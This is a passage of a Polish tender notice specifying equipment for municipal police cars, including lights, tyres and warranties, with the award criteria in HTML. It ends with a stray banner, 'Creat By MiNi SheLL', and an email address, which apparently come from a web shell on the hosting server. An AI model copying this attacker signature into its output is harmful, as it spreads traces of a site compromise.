9)	minimum czołowe poduszki powietrzne z przodu (kierowcy i pasażera  kabina 
kierowcy);
10)	wspomaganie układu kierowniczego;
11)	światła do jazdy dziennej;
12)	klimatyzacja minimum manualna;
13)	kierownica regulowana, co najmniej w jednej płaszczyźnie;
14)	drzwi boczne tylne po obydwu stronach pojazdu;
15)	szyba klapy od bagażnika wyposażona w ogrzewanie i wycieraczkę;
16)	fotel kierowcy z ręczną regulacją, co najmniej w dwóch płaszczyznach;
17)	czujniki parkowania tylne;
18)	tapicerka materiałowa foteli dla kierowcy i pasażerów bez wzorów w jaskrawych 
kolorach;
19)	w przedziale pasażerskim dywaniki podłogowe, gumowe (4 sztuki) i dodatkowe 
pokrowce na wszystkich fotelach bez wzorów w jaskrawych kolorach;
20)	wyposażenie pojazdu: apteczka, trójkąt, gaśnica typu A+B+C będąca 
wyposażeniem pojazdu, umocowana w odpowiednich uchwytach, o swobodnym 
dostępie do niej;
21)	pełnowymiarowe koło zapasowe lub koło dojazdowe, odpowiednio zamontowane, 
Zamawiający nie dopuszcza zestawu naprawczego do kół;
22)	dodatkowy komplet 4 opon zimowych zamontowanych na felgach stalowych;
23)	kolor nadwozia srebrny metalizowany, zgodnie z rozporządzeniem Ministra 
Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych 
pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2015 r. poz. 305 
z późn. zm.) - należy dołączyć katalog z zaznaczonym kolorem oferowanego pojazdu lub wzornik producenta;
24)	oznakowanie samochodu  zgodnie z cytowanym rozporządzeniem  szczegóły 
rozmieszczenia oklejenia uzgadniane po wyborze oferty, projekt oklejenia 
(wizualizacja w formie elektronicznej) ma zostać dostarczony (przesłany drogą 
elektroniczną) przez Wykonawcę, w terminie 14 dni roboczych od daty zawarcia umowy, celem jego uzgodnienia z Zamawiającym;
25)	na dachu instalacja sygnalizacyjno-ostrzegawcza świetlna (błyskowa) LED, 
 światło w kolorze niebieskim, belka z napisem Straż Miejska (Ż  z kropką), 
z możliwością podawania komunikatów głosowych wraz z manipulatorem 
(sterowanie i mikrofon), o niskim poborze prądu  zgodnie z rozporządzeniem 
Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (tekst jednolity: Dz. U. z 2015 r., poz. 305 z późn. zm.), zamontowana na relingach dachowych wzdłużnych lub na belce 
poprzecznej lub bezpośrednio na dachu pojazdu, dopuszcza się zamontowanie 
głośnika w innym miejscu, niż na belce świetlnej. Zamawiający wymaga belki LZN  LF lub rozwiązania, co najmniej równoważnego;
26)	belka sygnalizacyjno - ostrzegawcza (błyskowa) LED musi zapewnić możliwość  
podświetlenia (dotyczy napisu Straż Miejska);
27)	gwarancje: mechaniczna minimum 24 miesiące - bez limitów kilometrów lub 
z limitem kilometrów nie mniejszym niż 100 tysięcy kilometrów, na powłokę 
lakierniczą minimum 24 miesiące, na perforację minimum 72 miesiące;
28)	manipulator osadzony na zaczepie w uchwycie zamontowanym w pojeździe w łatwo dostępnym miejscu.
Samochody muszą spełniać wymagania techniczne określone w rozporządzeniu Ministra 
Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów 
oraz zakresu ich niezbędnego wyposażenia tekst jednolity: Dz. U. z 2015 r., poz. 305 z późn. zm.).
Samochody przed dostarczeniem muszą być, co najmniej zarejestrowane czasowo 
na podstawie homologacji producenta, przy wykorzystaniu pisemnego upoważnienia 
wystawionego przez Zamawiającego, który dopuszcza przekazanie pojazdu z pozwoleniem czasowym.
Samochody muszą być wyposażone w środki łączności (radiostacje), zgodnie z opisem 
w niniejszym rozdziale w pkt. A.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34110000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji mechanicznej, bez limitów  kilometrów </td><td>15</td></tr><tr><td>Koszt eksploatacji 1 pojazdu w pierwszym roku użytkowania</td><td>15</td></tr><tr><td>Częstotliwość przeglądów </td><td>5</td></tr><tr><td>Dostawa</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com